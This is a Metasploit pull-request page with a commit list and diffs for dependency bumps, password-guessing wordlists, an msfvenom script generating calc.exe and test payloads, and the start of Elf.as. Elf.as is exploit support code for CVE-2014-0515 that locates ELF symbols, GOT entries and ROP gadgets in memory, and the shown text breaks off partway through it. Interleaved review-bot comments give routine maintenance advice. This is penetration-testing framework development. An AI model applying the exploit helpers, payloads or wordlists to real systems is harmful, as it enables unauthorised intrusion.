Add butchered version of CVE-2015-1701 #5466

Merged
merged 271 commits into from
Jun 22, 2015
271 commits
50b2ae4
Add a plugin for making curl-like http requests
zeroSteiner Mar 13, 2015
72650d7
Use an authorization header and fix uri.path
zeroSteiner Mar 13, 2015
2070934
Improve output file handling and expand_path
zeroSteiner Mar 13, 2015
59f40d7
Rename the requests plugin to http_requests
zeroSteiner Mar 13, 2015
2e8e350
Rename the http_requests plugin and command to httpr
zeroSteiner Mar 24, 2015
cefec81
move plugins/http to plugins/request
kernelsmith May 15, 2015
f1e48b9
genericizes http request plugin
kernelsmith May 27, 2015
7d896ba
removes a proxy vestige
kernelsmith May 27, 2015
b236187
restores proper -u usage
kernelsmith May 28, 2015
fa9a222
changes type handling to be fully automatic
kernelsmith May 29, 2015
a0bcbd1
Merge branch 'master' of github.com:rapid7/metasploit-framework
shuckins-r7 Jun 1, 2015
9d1a7ce
New modules to support 64bit process powershell.
benpturner Jun 1, 2015
d22dda2
Provide more context and references
jvazquez-r7 Jun 1, 2015
c3e1505
Update total_commander to use the new cred API
wchen-r7 Jun 2, 2015
b98cc89
Update filezilla_client_cred to use the new cred API
wchen-r7 Jun 2, 2015
1ae9265
Update tortoisesvn to use the new cred API
wchen-r7 Jun 2, 2015
b4cfe93
Add creds API
void-in Jun 2, 2015
7485cf7
Remove unnecessary spaces
void-in Jun 2, 2015
ac2a52b
fix android/java reverse_tcp
timwr Jun 2, 2015
b837741
Land #5454 : Fix android/java reverse_tcp
OJ Jun 2, 2015
27ddee4
Merge branch 'master' of github.com:rapid7/metasploit-framework
shuckins-r7 Jun 2, 2015
aac2db8
Remove comment about report_auth_info
wchen-r7 Jun 2, 2015
28556ea
Update spark_im to use the new cred API
wchen-r7 Jun 2, 2015
63708f2
Add module_fullname: fullname
wchen-r7 Jun 2, 2015
dddbf38
Updated payload spec to be in the correct order and updated payload c…
benpturner Jun 2, 2015
e431631
Add module_fullname: fullname,
wchen-r7 Jun 2, 2015
c64f025
Add module_fullname: fullname
wchen-r7 Jun 2, 2015
22a1b0a
Land #5399, latest recog and MDM
shuckins-r7 Jun 2, 2015
9713fe7
Updating to MDM 1.2.1
shuckins-r7 Jun 2, 2015
0313f0b
Check for a nil header value
zeroSteiner Jun 2, 2015
ef0d649
Update smartermail to use the new cred API
wchen-r7 Jun 3, 2015
b038760
Update razer_synapse to use the new cred API
wchen-r7 Jun 3, 2015
24ec3b2
Changed vprint_error to fail_with method.
espreto Jun 3, 2015
b305fa6
Changed vprint_error when nothing was downloaded.
espreto Jun 3, 2015
656f64d
Update razorsql to use the new cred API
wchen-r7 Jun 3, 2015
39d38f1
Update pptpd_chap_secrets to use the new cred API
wchen-r7 Jun 3, 2015
74117a7
Allow to execute payload from the flash renderer
jvazquez-r7 Jun 3, 2015
d3c3741
Use run_host so that we can use THREADS
jsherwood0 Jun 3, 2015
4ee0a14
Land #5477, speed improvements to snmp_login
Jun 4, 2015
a0aa613
Update ca_arcserve_rpc_authbypass to use the new cred API
wchen-r7 Jun 4, 2015
78e4677
Oops it blew up
wchen-r7 Jun 4, 2015
80cb70c
Add support for Windows 8.1/Firefox
jvazquez-r7 Jun 4, 2015
098f31c
Land support for Windows 8.1
jvazquez-r7 Jun 4, 2015
744baf2
Update kloxo_sqli to use the new cred API
wchen-r7 Jun 4, 2015
ab68d84
Add more targets
jvazquez-r7 Jun 4, 2015
75454f0
Update AS source code
jvazquez-r7 Jun 4, 2015
487cc15
Land #5476, multi-platform update for adobe_flash_net_connection_conf…
wchen-r7 Jun 4, 2015
7de78c1
Land #5447, more info about using the deprecated report_auth_info
wchen-r7 Jun 4, 2015
503f6a1
Land #4926, add request plugin for http(s)
kernelsmith Jun 4, 2015
23df66b
Land #5481, no powershell. exec shellcode from the renderer process.
wchen-r7 Jun 4, 2015
d4f418f
Style corrections
void-in Jun 4, 2015
06cc759
Use the correct help output for the ps command
Jun 4, 2015
346ea40
fix some alignment, add usage
Jun 4, 2015
26785b3
Land #5483 : Use the correct help output for the ps command
OJ Jun 4, 2015
874e090
Update wordpress_login_enum to use the new cred API
wchen-r7 Jun 4, 2015
02181ad
Update CVE-2014-0556
jvazquez-r7 Jun 4, 2015
51d98e1
Update AS code
jvazquez-r7 Jun 4, 2015
a53a68c
Refactor db_nmap and fix the save option
wvu Jun 4, 2015
c003602
Remove report_store_local from the spec
wvu Jun 4, 2015
b291d41
Quick hack to remove hard-coded offsets
OJ Jun 5, 2015
910ae8a
Fix #5461, actually stop a job from the RPC service
wchen-r7 Jun 5, 2015
935ed41
Land #5486, exec code from the renderer process instead of Powershell
wchen-r7 Jun 5, 2015
71a8487
Correct Flash version in the module description
wchen-r7 Jun 5, 2015
318f67f
update descriptions
jvazquez-r7 Jun 5, 2015
e151e38
Land #5489, @wchen-r7's flash exploit descriptions update
jvazquez-r7 Jun 5, 2015
15916f0
Backport an upstream fix for a nil header
wvu Jun 5, 2015
a3b61dc
Land #5488, fix job stopping from RPC service
Jun 5, 2015
bb9439e
land #5487, refactor and fix save function for db_nmap
Jun 5, 2015
0f4304c
Land #5494, handle short reads from mysql
Jun 5, 2015
57b7d10
Land #5449, @wchen-r7 updates total_commander to use the new cred API
jvazquez-r7 Jun 5, 2015
c3437da
Land #5451, @wchen-r7 Update filezilla_client_cred to use the new cre…
jvazquez-r7 Jun 5, 2015
f29b38b
Add the top 20 keyboard patterns as passwords
Jun 5, 2015
6b05302
Fixes #5459, refactors LoginScanner::SNMP
Jun 6, 2015
135958a
Cleanup the udp_(sweep|probe) SNMP generators
Jun 6, 2015
bf35b9b
Minor fix
jvazquez-r7 Jun 6, 2015
dca2607
Land #5452, @wchen-r7 Update tortoisesvn to use the new cred API
jvazquez-r7 Jun 6, 2015
cec20ec
Handle a rare corner case
Jun 6, 2015
fe09d98
Small rework of the spinners, clear the line when done
Jun 6, 2015
2942cb1
Land #5415, changes spaces in PSH shell output
Jun 6, 2015
df6722c
Land #5496, top 20 keyboard pattern passwords
wvu Jun 6, 2015
89e7dc6
Land #5499, polish dem spinners
wvu Jun 6, 2015
f761d41
Adjust line clearing to cover only the text
wvu Jun 6, 2015
d4ddc53
Fix #5499, small fix for line clearing
wvu Jun 6, 2015
bd36908
Fix #5500 by checking for session.respond_to?(:response_timeout)
Jun 6, 2015
93125a9
Land #5501, check method response_timeout before using
wchen-r7 Jun 7, 2015
a465104
Fix older Windows payloads to not require UUID
Jun 7, 2015
0557d21
Land #5503, fix a stack trace on legacy Windows payloads
Jun 7, 2015
537dc6e
Update Payload Cached Sizes fails in PSH Script
Jun 7, 2015
20b605e
Remove duplicate exec
benpturner Jun 7, 2015
1f11cd5
Lands #5446, support for 64-bit native powershell payloads
Jun 7, 2015
edcd1e3
Land #5504, handle cases where the script may be empty
Jun 7, 2015
25aa96c
Land #5456, removes obsolete comment
Jun 7, 2015
a39539f
Land #5457, @wchen-r7 updates spark_im to use the new cred API
jvazquez-r7 Jun 8, 2015
245c763
Update nessus_xmlrpc_logic to use the new creds API
void-in Jun 8, 2015
3279518
Move VMware modules to the VMware directory
void-in Jun 8, 2015
5a6a16c
Resolve #4326, remove msfpayload & msfencode. Use msfvenom instead!
wchen-r7 Jun 8, 2015
49e4820
Add deprecated note to the existing modules
void-in Jun 9, 2015
b7f0fad
Modify CVE-2014-0569 to use the flash exploitation code
jvazquez-r7 Jun 9, 2015
39851d2
Unset debug flag
jvazquez-r7 Jun 9, 2015
5bab1cf
Fix indentation
jvazquez-r7 Jun 9, 2015
4f1ee3f
Really fix indentation
jvazquez-r7 Jun 9, 2015
5ab882a
Clean up module
wvu Jun 9, 2015
9c97da3
Land #5224, ProFTPD mod_copy exploit
wvu Jun 9, 2015
cc8650f
Fix TMPPATH description
wvu Jun 9, 2015
d31a59c
Fix #5224, altered option description
wvu Jun 9, 2015
8a69704
Fix up commas
wvu Jun 9, 2015
9fa4234
Fix #5224, comma fixes
wvu Jun 9, 2015
f4649cb
Delete old AS
jvazquez-r7 Jun 9, 2015
cf8c6b5
Debug version working
jvazquez-r7 Jun 9, 2015
d9db456
Delete debug messages
jvazquez-r7 Jun 9, 2015
e5d6c9a
Make last code cleanup
jvazquez-r7 Jun 9, 2015
7c91aee
Don't use a "connected" to keep compat with BSD
Jun 10, 2015
3fe6ddd
Change credential status from untried to successful
void-in Jun 10, 2015
3ffe006
Update titan_ftp_admin_pwd to use the new creds API
void-in Jun 10, 2015
7cb82f5
Add ftp port for service
void-in Jun 10, 2015
d95a0f4
Update AS code
jvazquez-r7 Jun 10, 2015
64b486e
Change filename
jvazquez-r7 Jun 10, 2015
a6fe383
Use AS Exploiter
jvazquez-r7 Jun 10, 2015
fb531d0
Update version coverage
jvazquez-r7 Jun 10, 2015
2b4fe96
Tweak Heap Spray
jvazquez-r7 Jun 10, 2015
0d979f6
Minor fixups on newish modules
Jun 10, 2015
dc2fec7
Land #5509, remove msfencode and msfpayload
Jun 10, 2015
b23647d
Land #5521, @todb-r7's module cleanup
wvu Jun 10, 2015
667db8b
Land #5517, adobe_flash_casi32_int_overflow (exec from the flash rend…
wchen-r7 Jun 10, 2015
d622c78
Land #5519, adobe_flash_uncompress_zlib_uninitialized in the flash re…
wchen-r7 Jun 10, 2015
ecbddc6
Play with memory a little bit better
jvazquez-r7 Jun 10, 2015
8dad739
Land #5508, Get Ready to Move VMware modules to the VMware directory
wchen-r7 Jun 10, 2015
7fba64e
Allow more search space
jvazquez-r7 Jun 10, 2015
0d2454d
Fix indentation
jvazquez-r7 Jun 10, 2015
6c7ee10
Update to use the new flash Exploiter
jvazquez-r7 Jun 10, 2015
ab13229
Add Exploiter AS
jvazquez-r7 Jun 10, 2015
7527aa4
Disable debug
jvazquez-r7 Jun 10, 2015
7202e27
Fix indentation
jvazquez-r7 Jun 10, 2015
1d05ce1
Fix for indentation
jvazquez-r7 Jun 10, 2015
2bb3a50
Fix else indentation
jvazquez-r7 Jun 10, 2015
6456256
Fix method indentation
jvazquez-r7 Jun 10, 2015
af31112
Fix exploit indentation
jvazquez-r7 Jun 10, 2015
4c5b1fb
Land #5522, adobe_flash_worker_byte_array_uaf in the flash renderer
wchen-r7 Jun 10, 2015
ae21b0c
Land #5523, adobe_flash_domain_memory_uaf in the flash renderer
wchen-r7 Jun 10, 2015
8ed13b1
Add linux support for CVE-2014-0515
jvazquez-r7 Jun 11, 2015
72672fc
Delete debug
jvazquez-r7 Jun 11, 2015
8f4a44a
Land #5474, @wchen-r7 Updates pptpd_chap_secrets to use the new cred API
jvazquez-r7 Jun 12, 2015
20170bd
Report as hash
wchen-r7 Jun 12, 2015
7baebee
Update MDM dependency
trevrosen Jun 12, 2015
89d03a1
Symbol to String
wchen-r7 Jun 12, 2015
f279c6c
Land #5252, @espreto's module for WordPress Front-end Editor File Upl…
jvazquez-r7 Jun 12, 2015
a53ca53
Fix inconsistency - multi/handler
g0tmi1k Jun 12, 2015
184c20c
Do minor cleanup
jvazquez-r7 Jun 12, 2015
e628d71
Land #5397, @espreto's module for WordPress Simple Backup File Read V…
jvazquez-r7 Jun 12, 2015
6dcc9b7
More inconsistencies
g0tmi1k Jun 12, 2015
0f230ce
Land #5526
shuckins-r7 Jun 12, 2015
9dde32f
Updating to MDM 1.2.3
shuckins-r7 Jun 12, 2015
7f0e334
Added Windows 2003 SP1 & SP2 French targets
omarix Jun 13, 2015
c7cda25
Empty lines removed at line 624 and line 721.
omarix Jun 13, 2015
ab6f3a7
Fix #5531, the ```stage_payload``` method does not take arguments.
Jun 13, 2015
77f506c
Land #5532 : Fix #5531, the stage_payload method does not take arguments
OJ Jun 13, 2015
17b8ddc
Land #5524, adobe_flash_pixel_bender_bof in flash renderer
wchen-r7 Jun 15, 2015
c20cf15
Must have last_attempted_at key
wchen-r7 Jun 15, 2015
ebce415
Land #5507, Update nessus_xmlrpc_logic to use the new creds API
wchen-r7 Jun 15, 2015
308b1a3
Don't deregister username & password
wchen-r7 Jun 15, 2015
940d045
Correctly report rport
wchen-r7 Jun 15, 2015
907f596
Land #5520, Update titan_ftp_admin_pwd to use the new creds API
wchen-r7 Jun 15, 2015
8d640a0
Land #5527, multi/handler -> exploit/multi/handler
wvu Jun 15, 2015
80f1173
Style and scanner usability cleanup for ssh_version
jhart-r7 Jun 15, 2015
feb7263
Wire in recog support for ssh_version
jhart-r7 Jun 15, 2015
079a9d4
Use peer
jhart-r7 Jun 15, 2015
5ac97d1
Lands #5538, adds Recog to ssh_version
Jun 15, 2015
0b88e86
Using the new cred API for multiple auxiliary modules
wchen-r7 Jun 15, 2015
eb39eaa
Add support to decryption v2
jvazquez-r7 Jun 16, 2015
c06e16f
Merge pull request #30 from jvazquez-r7/review_5468
wchen-r7 Jun 16, 2015
b6379b4
Update drupal_views_user_enum
wchen-r7 Jun 16, 2015
2778274
Added new SSL Labs API fields and fixed minor errors
dnkolegov Jun 16, 2015
c3d2797
Fixed Info fields
dnkolegov Jun 16, 2015
fcf6212
Update telnet capture module to use the new creds API
void-in Jun 16, 2015
9dbdaf1
Add AutoVerifySessionTimeout Meterpreter advanced option
OJ Jun 16, 2015
67065e1
Update database.yml.example to ref MSF-DEV
Jun 16, 2015
11bf416
Land #5548, database.yml.example MSF-DEV ref
wvu Jun 16, 2015
3410782
Capitalized 'Accepted'
g0tmi1k Jun 16, 2015
4fee6b2
Land #5549, OptEnum "accepted" capitalization
wvu Jun 16, 2015
33139c4
shell_to_meterpreter minor improvements
g0tmi1k Jun 16, 2015
ef825fb
Land #5530, shell_to_meterpreter improvements
wvu Jun 16, 2015
f5b9be7
Land #5468, @wchen-r7's updates razorsql to use the new creds api
jvazquez-r7 Jun 16, 2015
f2e2af1
Remove msfencode from the gemspec
wvu Jun 16, 2015
b40e9f6
util/exe - replace tabs with spaces
g0tmi1k Jun 17, 2015
37546c7
to_exe_vbs - Allow for exe_filename to be defined
g0tmi1k Jun 17, 2015
dc07938
Land #5550, custom exe_filename for to_exe_vba
wvu Jun 17, 2015
0f2897d
Land #5551, Remove msfencode from the gemspec
wchen-r7 Jun 17, 2015
772a5dd
Created array and added support for version 4
Th3R3p0 Jun 17, 2015
e30b0e0
forced client to version 3 for servers and added comments. This adds …
Th3R3p0 Jun 17, 2015
a6c7f93
changed text to show support for RFB version 4.001
Th3R3p0 Jun 17, 2015
8ea0953
removed a debugging line
Th3R3p0 Jun 17, 2015
ce9481d
Inconsistency - If datastore['VERBOSE'] vs vprint
g0tmi1k Jun 18, 2015
de1542e
Add module for CVE-2015-3090
jvazquez-r7 Jun 18, 2015
55f077f
Fix indentation
jvazquez-r7 Jun 18, 2015
27a5838
Fix one more line indentation
jvazquez-r7 Jun 18, 2015
13a3f27
Change ExcellentRanking to GoodRanking for MS14-064
wchen-r7 Jun 18, 2015
afcb016
Minor description fixups.
Jun 18, 2015
15f0cf4
Land #5561, @todb-r7's release fixes
wvu Jun 18, 2015
308cad8
Fix #5565, Fix os.js service pack detection
wchen-r7 Jun 18, 2015
9b5770c
Change to Metasploit::Model::Login::Status::SUCCESSFUL
wchen-r7 Jun 19, 2015
fb9ad66
Change to Metasploit::Model::Login::Status::SUCCESSFUL
wchen-r7 Jun 19, 2015
7e91121
Change to Metasploit::Model::Login::Status::SUCCESSFUL
wchen-r7 Jun 19, 2015
fc14178
Support hash format
wchen-r7 Jun 19, 2015
fc35a53
Pass options correctly
wchen-r7 Jun 19, 2015
76cd959
Fix author
aushack Jun 19, 2015
0d7ef6f
Pass username as symbol
jvazquez-r7 Jun 19, 2015
80f6e90
Land #5463, @wchen-r7 updates smartermail to use the new cred API
jvazquez-r7 Jun 19, 2015
6d2b7e0
Use downcase
jvazquez-r7 Jun 19, 2015
b349549
Land #5464, @wchen-r7 Updates razer_synapse to use the new cred API
jvazquez-r7 Jun 19, 2015
357a392
Trying to report more accurate status
jvazquez-r7 Jun 19, 2015
0f17f62
Report last_attempted_at
jvazquez-r7 Jun 19, 2015
1c357e6
Land #5478, @wchen-r7 Updates ca_arcserve_rpc_authbypass to use the n…
jvazquez-r7 Jun 19, 2015
c2f0973
Report attempt_time
jvazquez-r7 Jun 19, 2015
c95b3bb
Land #5479, @wchen-r7 Updates kloxo_sqli to use the new cred API
jvazquez-r7 Jun 19, 2015
15985e8
Land #5559, Adobe Flash Player ShaderJob Buffer Overflow
wchen-r7 Jun 19, 2015
d86c21e
Land #5567, author fix
wvu Jun 19, 2015
7f56b46
Land #5546, Use the new cred API for auxiliary/server/capture/telnet
wchen-r7 Jun 19, 2015
dfae4bb
Make reporting more accurate
jvazquez-r7 Jun 19, 2015
ebd376e
Land #5485, @wchen-r7 updates wordpress_login_enum to use the new cre…
jvazquez-r7 Jun 19, 2015
d116f1e
Land #5566, @wchen-r7 fixes #5565 modifying os.js
jvazquez-r7 Jun 19, 2015
6ec8488
Land #5560, @wchen-r7 Changes ExcellentRanking to GoodRanking for MS1…
jvazquez-r7 Jun 19, 2015
b994801
Revert auto tab replacement
wvu Jun 19, 2015
2587595
Land #5556, vprint_status fix
wvu Jun 19, 2015
5a548c3
Land #5453, Update dbvis_enum to use the new cred API
wchen-r7 Jun 19, 2015
5a27738
remove some trailing commas
Jun 19, 2015
bf170a1
the API sometimes returns negative percents - treat these as 0
Jun 19, 2015
d19c2e7
Land #5544, track updates to SSL Labs API
Jun 19, 2015
34ece37
First off, iconv is gone, and zlib is stdlib
Jun 19, 2015
afe5bb5
Get rid of the fall through methods
Jun 19, 2015
a004c72
Get rid of the encode test and iconv fallback
Jun 19, 2015
01e3738
Add some YARD docs to the ebcdic methods
Jun 19, 2015
66fecb2
Add some specs around changed methods
Jun 19, 2015
7eeb880
Do minor code cleanup
jvazquez-r7 Jun 19, 2015
d672ac1
Correct service name for mssql for scanner detection
gmikeska-r7 Jun 19, 2015
34d5d92
Land #5555, @Th3R3p0's support for RFB Version 4
jvazquez-r7 Jun 19, 2015
bd097e3
Land #5497, Refactor LoginScanner::SNMP to be fast and less buggy
wchen-r7 Jun 19, 2015
b104155
Do Metasploit::Model::Login::Status::UNTRIED
wchen-r7 Jun 19, 2015
ef286fd
Remove report_auth_info
wchen-r7 Jun 19, 2015
8342758
report_note for group info
wchen-r7 Jun 19, 2015
0b0cc36
Land #5569, Correct service name for mssql for scanner detection
wchen-r7 Jun 19, 2015
252b573
Land #5547, configurable auto session timeout
Jun 19, 2015
b580f93
New password from Snowden
Jun 19, 2015
fa6e459
Provide context to the note
jvazquez-r7 Jun 19, 2015
4762e9f
Land #5540, @wchen-r7's changes for multiple auxiliary modules to use…
jvazquez-r7 Jun 19, 2015
61ad4ad
Delete commas
jvazquez-r7 Jun 19, 2015
74bc9f7
Land #5529, @omarix's Windows 2003 SP1 & SP2 French targets for MS08-067
jvazquez-r7 Jun 19, 2015
04901ba
Land #5572 @todb-r7's adds snowden's password to unix_passwords.txt
jvazquez-r7 Jun 19, 2015
bf7e069
Land #5570, @todb-r7 Removes references to Iconv gem, since it's depr…
jvazquez-r7 Jun 19, 2015
b78ba55
Merge minor CVE-2015-1701 from zeroSteiner
OJ Jun 21, 2015
3686acc
Merge branch 'upstream/master' into cve-2015-1701
OJ Jun 21, 2015
14 changes: 7 additions & 7 deletions Gemfile.lock
Expand Up @@ -15,7 +15,7 @@ PATH
packetfu (= 1.1.9)
railties
rb-readline-r7
recog (~> 1.0)
recog (~> 2.0)
robots
rubyzip (~> 1.1)
sqlite3
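Review bot: the `recog (~> 1.0)` to `recog (~> 2.0)` change in this PATH block is a major-version bump, and the PATH block is generated from metasploit-framework.gemspec, so the gemspec's own recog constraint has to move to `~> 2.0` in the same change or the next `bundle install` regenerates it back to `~> 1.0`. The metasploit_data_models (1.2.3) entry further down in this lock already requires `recog (~> 2.0)`, so the two constraints must land together or the lock will not resolve.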
Expand All @@ -24,7 +24,7 @@ PATH
activerecord (>= 4.0.9, < 4.1.0)
metasploit-credential (~> 1.0)
metasploit-framework (= 4.11.0.pre.dev)
metasploit_data_models (~> 1.0)
metasploit_data_models (~> 1.2)
pg (>= 0.11)
metasploit-framework-pcap (4.11.0.pre.dev)
metasploit-framework (= 4.11.0.pre.dev)
Expand Down Expand Up @@ -124,7 +124,7 @@ GEM
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (1.0.2)
metasploit_data_models (1.1.0)
metasploit_data_models (1.2.3)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
arel-helpers
Expand All @@ -133,13 +133,13 @@ GEM
pg
postgres_ext
railties (>= 4.0.9, < 4.1.0)
recog (~> 1.0)
recog (~> 2.0)
method_source (0.8.2)
mime-types (2.4.3)
mini_portile (0.6.2)
minitest (4.7.5)
msgpack (0.5.11)
multi_json (1.11.0)
msgpack (0.6.0)
multi_json (1.11.1)
multi_test (0.1.2)
network_interface (0.0.1)
nokogiri (1.6.6.2)
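Review bot: the msgpack bump from 0.5.11 to 0.6.0 and the multi_json bump from 1.11.0 to 1.11.1 are unrelated to the CVE-2015-1701 change and to the recog/MDM updates this lock is otherwise tracking. msgpack is the serialization the RPC service speaks, so a minor-version change deserves a quick msfrpcd round-trip check before landing; otherwise drop those two lines from this lock and bump them in their own change.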
Expand Down Expand Up @@ -174,7 +174,7 @@ GEM
thor (>= 0.18.1, < 2.0)
rake (10.4.2)
rb-readline-r7 (0.5.2.0)
recog (1.0.29)
recog (2.0.5)
nokogiri
redcarpet (3.2.3)
rkelly-remix (0.0.6)
Expand Down
3 changes: 1 addition & 2 deletions config/database.yml.example
Expand Up @@ -3,8 +3,7 @@
# these days. (No SQLite, no MySQL).
#
# To set up a metasploit database, follow the directions hosted at:
# https://fedoraproject.org/wiki/Metasploit_Postgres_Setup (Works on
# essentially any Linux distro, not just Fedora)
# http://r-7.co/MSF-DEV#set-up-postgresql
development: &pgsql
adapter: postgresql
database: metasploit_framework_development
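Review bot: the replacement URL `http://r-7.co/MSF-DEV#set-up-postgresql` is a plain-http link-shortener address in a file that ships to every install; a shortener target can be changed or expire, and the `#set-up-postgresql` fragment only survives if the redirect preserves it. Prefer the canonical https destination the shortener resolves to, and keep the dropped note that the instructions work on any Linux distro if that is still true of the new page.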
Expand Down
Binary file removed data/exploits/CVE-2014-0515/Graph.swf
Binary file not shown.
Binary file added data/exploits/CVE-2014-0515/msf.swf
Binary file not shown.
Binary file modified data/exploits/CVE-2014-0556/msf.swf
100755 → 100644
Binary file not shown.
Binary file modified data/exploits/CVE-2014-0569/msf.swf
Binary file not shown.
Binary file modified data/exploits/CVE-2014-8440/msf.swf
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0311/msf.swf
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0313/msf.swf
100755 → 100644
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0336/msf.swf
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0336/trigger.swf
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0359/msf.swf
Binary file not shown.
Binary file modified data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
Binary file not shown.
Binary file modified data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
Binary file not shown.
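Review bot: the two CVE-2015-1701 DLLs are replaced as opaque binaries, with no corresponding source or build change visible on this page even though the PR title is about this exploit. The commit that touches them should reference the source that produced them and the toolchain and flags used, so a reviewer can rebuild and diff the DLLs rather than accept a modified binary on its hash alone.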
Binary file added data/exploits/CVE-2015-3090/msf.swf
Binary file not shown.
2 changes: 1 addition & 1 deletion data/js/detect/os.js
Expand Up @@ -1027,7 +1027,7 @@ os_detect.getVersion = function(){
}
switch (navigator.appMinorVersion){
case ";SP2;":
ua_version += ";SP2";
os_sp = "SP2";
break;
}
}
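Review bot: `os_sp = "SP2";` replaces an append to `ua_version`, but the hunk does not show `os_sp` being declared inside `os_detect.getVersion`; if it is not `var`-declared in this scope the assignment creates an implicit global in non-strict browser JavaScript, and the value is lost unless it is also folded into what the function returns. Confirm the declaration and the return path, and that the IE-only `navigator.appMinorVersion` switch still falls through cleanly when the value is not `;SP2;`.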
Expand Down
20 changes: 20 additions & 0 deletions data/wordlists/keyboard-patterns.txt
@@ -0,0 +1,20 @@
qwerty
qwertyuiop
1qaz2wsx
qazwsx
asdfgh
zxcvbnm
1234qwer
q1w2e3r4t5
qwer1234
q1w2e3r4
asdfasdf
qazwsxedc
asdfghjkl
q1w2e3
1qazxsw2
12QWaszx
qweasdzxc
mnbvcxz
a1b2c3d4
adgjmptw
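Review bot: `12QWaszx` is the only mixed-case entry in an otherwise all-lowercase list; keyboard-walk lists are normally consumed with case-mangling rules that generate the shifted forms, so either keep every entry lowercase and let the rules produce `12QWaszx`, or add the common shifted variants consistently rather than for one pattern.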
3 changes: 2 additions & 1 deletion data/wordlists/unix_passwords.txt
Expand Up @@ -1002,4 +1002,5 @@ sq!us3r
adminpasswd
raspberry
74k&^*nh#$
arcsight
arcsight
MargaretThatcheris110%SEXY
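Review bot: the `-arcsight` / `+arcsight` pair means the file previously ended without a trailing newline and the new entry was appended after fixing that; make sure the new last line `MargaretThatcheris110%SEXY` itself ends with a newline so the next addition does not produce the same spurious churn, and that readers which split on `\n` do not pick up an empty trailing candidate.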
10 changes: 5 additions & 5 deletions external/source/DLLHijackAuditKit/regenerate_binaries.rb
Expand Up @@ -2,12 +2,12 @@

dllbase = File.expand_path(File.dirname(__FILE__))
msfbase = File.expand_path(File.join(dllbase, "..", "..", ".."))
msfp = File.join(msfbase, "msfpayload")
msfv = File.join(msfbase, "msfvenom")

Dir.chdir(dllbase)

system("ruby #{msfp} windows/exec CMD=calc.exe X > runcalc.exe")
system("ruby #{msfp} windows/exec CMD=calc.exe D > runcalc.dll")
system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' D > runtest.dll")
system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' X > runtest.exe")
system("ruby #{msfv} -p windows/exec CMD=calc.exe -f exe -o runcalc.exe")
system("ruby #{msfv} -p windows/exec CMD=calc.exe -f dll -o runcalc.dll")
system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f dll -o runtest.dll")
system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f exe -o runtest.exe")
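Review bot: the four `system(...)` calls discard their return value, so a failed msfvenom run (payload generation error, or `-f dll` unsupported by the installed version) leaves stale or missing runcalc.* / runtest.* files while the script still exits 0; wrap each as `system(...) or abort("msfvenom failed")`, or pass the arguments to `system` as a list so the `CMD='cmd.exe /c echo yes > exploited.txt'` quoting is no longer re-parsed by the shell.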

235 changes: 235 additions & 0 deletions external/source/exploits/CVE-2014-0515/Elf.as
@@ -0,0 +1,235 @@
package
{
public class Elf
{
private const PT_DYNAMIC:uint = 2
private const PT_LOAD:uint = 1
private const PT_READ_EXEC:uint = 5
private const DT_SYMTAB:uint = 6
private const DT_STRTAB:uint = 5
private const DT_PLTGOT:uint = 3

private var e_ba:ExploitByteArray
// elf base address
public var base:uint = 0
// program header address
public var ph:uint = 0
// number of program headers
public var ph_size:uint = 0
// program header entry size
public var ph_esize:uint = 0
// DYNAMIC segment address
public var seg_dynamic:uint = 0
// DYNAMIC segment size
public var seg_dynamic_size:uint = 0
// CODE segment address
public var seg_exec:uint = 0
// CODE segment size
public var seg_exec_size:uint = 0
// .dynsyn section address
public var sec_dynsym:uint = 0
// .synstr section address
public var sec_dynstr:uint = 0
// .got.plt section address
public var sec_got_plt:uint = 0

public function Elf(ba:ExploitByteArray, addr:uint)
{
e_ba = ba
set_base(addr)
set_program_header()
set_program_header_size()
set_program_header_entry_size()
set_dynamic_segment()
set_exec_segment()
set_dynsym()
set_dynstr()
set_got_plt()
}

public function external_symbol(name:String):uint {
var entry:uint = 0
var st_name:uint = 0
var st_value:uint = 0
var st_size:uint = 0
var st_info:uint = 0
var st_other:uint = 0
var st_shndx:uint = 0
var st_string:String = ""
var got_plt_index:uint = 0

for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
entry = sec_dynsym + 0x10 + (i * 0x10)
st_name = e_ba.read(entry)
st_value = e_ba.read(entry + 4)
st_info = e_ba.read(entry + 0xc, "byte")
st_string = e_ba.read_string(sec_dynstr + st_name)
if (st_string == name) {
return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
}
if (st_info != 0x11) {
got_plt_index++
}
}
throw new Error()
}

public function symbol(name:String):uint {
var entry:uint = 0
var st_name:uint = 0
var st_value:uint = 0
var st_size:uint = 0
var st_info:uint = 0
var st_other:uint = 0
var st_shndx:uint = 0
var st_string:String = ""

for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
entry = sec_dynsym + 0x10 + (i * 0x10)
st_name = e_ba.read(entry)
st_value = e_ba.read(entry + 4)
st_info = e_ba.read(entry + 0xc, "byte")
st_string = e_ba.read_string(sec_dynstr + st_name)
if (st_string == name) {
return base + st_value
}
}
throw new Error()
}


public function gadget(gadget:String, hint:uint):uint
{
var value:uint = parseInt(gadget, 16)
var contents:uint = 0
for (var i:uint = 0; i < seg_exec_size - 4; i++) {
contents = e_ba.read(seg_exec + i)
if (hint == 0xffffffff && value == contents) {
return seg_exec + i
}
if (hint != 0xffffffff && value == (contents & hint)) {
return seg_exec + i
}
}
throw new Error()
}

private function set_base(addr:uint):void
{
addr &= 0xffff0000
while (true) {
if (e_ba.read(addr) == 0x464c457f) {
base = addr
return
}
addr -= 0x1000
}

throw new Error()
}

private function set_program_header():void
{
ph = base + e_ba.read(base + 0x1c)
}

private function set_program_header_size():void
{
ph_size = e_ba.read(base + 0x2c, "word")
}

private function set_program_header_entry_size():void
{
ph_esize = e_ba.read(base + 0x2a, "word")
}

private function set_dynamic_segment():void
{
var entry:uint = 0
var p_type:uint = 0

for (var i:uint = 0; i < ph_size; i++) {
